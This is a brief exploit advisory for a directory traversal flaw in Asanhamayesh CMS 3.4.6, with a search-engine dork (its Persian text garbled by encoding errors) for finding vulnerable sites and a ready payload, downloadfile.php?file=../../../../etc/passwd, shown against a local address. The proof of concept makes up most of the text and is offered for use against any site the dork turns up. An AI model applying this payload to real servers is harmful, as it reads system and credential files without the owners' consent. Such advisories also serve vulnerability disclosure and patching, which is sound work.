=================================================================================================
| # Title     : Asanhamayesh CMS 3.4.6 Directory traversal Vulnerability                        |
| # Author    : indoushka                                                                       |
| # Tested on : windows 10 FranÃ§ais V.(Pro) / browser : Mozilla firefox 63.0.3 (32-bit)         |
| # Dork      : Ø·Ø±Ø§Ø Ùˆ Ù¾Ø´ØªÛŒØ¨Ø§Ù† : Ø¢Ø³Ø§Ù† Ù‡Ù…Ø§ÛŒØ´ (Ù†Ø±Ù… Ø§ÙØ²Ø§Ø± Ù…Ø¯ÛŒØ±ÛŒØª Ù‡Ù…Ø§ÛŒØ´ Ùˆ Ú©Ù†ÙØ±Ø§Ù†Ø³) ÙˆÛŒØ±Ø§ÛŒØ´ 3.4.6     |
=================================================================================================

poc :

[+] Dorking Ä°n Google Or Other Search Enggine .

[+] use payload : /downloadfile.php?file=../../../../../../../../../../etc/passwd

[+] http://127.0.0.1/itjdconfir/fa/downloadfile.php?file=../../../../../../../../../../etc/passwd


====Greetings to :===================================================================================================================
| jericho * Larry W. Cashdollar * brutelogic* hyp3rlinx* 9aylas * djroot.dz * LiquidWorm* Hussin-X *D4NB4R * shadow_00715 * yasMouh |
=====================================================================================================================================